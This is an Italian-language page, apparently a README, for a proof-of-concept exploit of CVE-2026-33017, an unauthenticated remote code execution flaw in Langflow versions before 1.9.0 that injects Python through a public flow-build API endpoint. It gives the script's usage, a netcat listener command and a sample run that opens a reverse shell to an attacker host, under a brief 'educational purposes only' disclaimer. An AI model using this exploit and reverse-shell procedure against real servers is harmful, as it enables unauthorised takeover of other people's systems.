
CVE-2026-33017 Exploit | di infrar3d
xpl0ited da infrar3d
Questo proof-of-concept sfrutta una vulnerabilità critica di Remote Code Execution (RCE) nelle versioni di Langflow precedenti alla 1.9.0. La vulnerabilità consente a utenti non autenticati di eseguire comandi di sistema arbitrari iniettando codice Python malevolo tramite l'endpoint API di creazione dei flow. La vulnerabilità è presente nell'endpoint /api/v1/build_public_tmp/{flow_id}/flow endpoint, che non sanitizza correttamente il codice fornito dall'utente nel campo code dei template dei componenti.
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target base URL
-f, --flow FLOW Flow ID
-H, --host HOST Listener host for reverse shell
-P, --port PORT Listener port (default: 4444)
Il primo terminale (listener):
nc -lvnp 4444
Il secondo terminale (exploit):
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444
Questo software e il codice proof-of-concept sono forniti solo a scopo educativo e di ricerca.
Sei responsabile del rispetto di tutte le leggi applicabili. Usalo in modo etico e responsabile.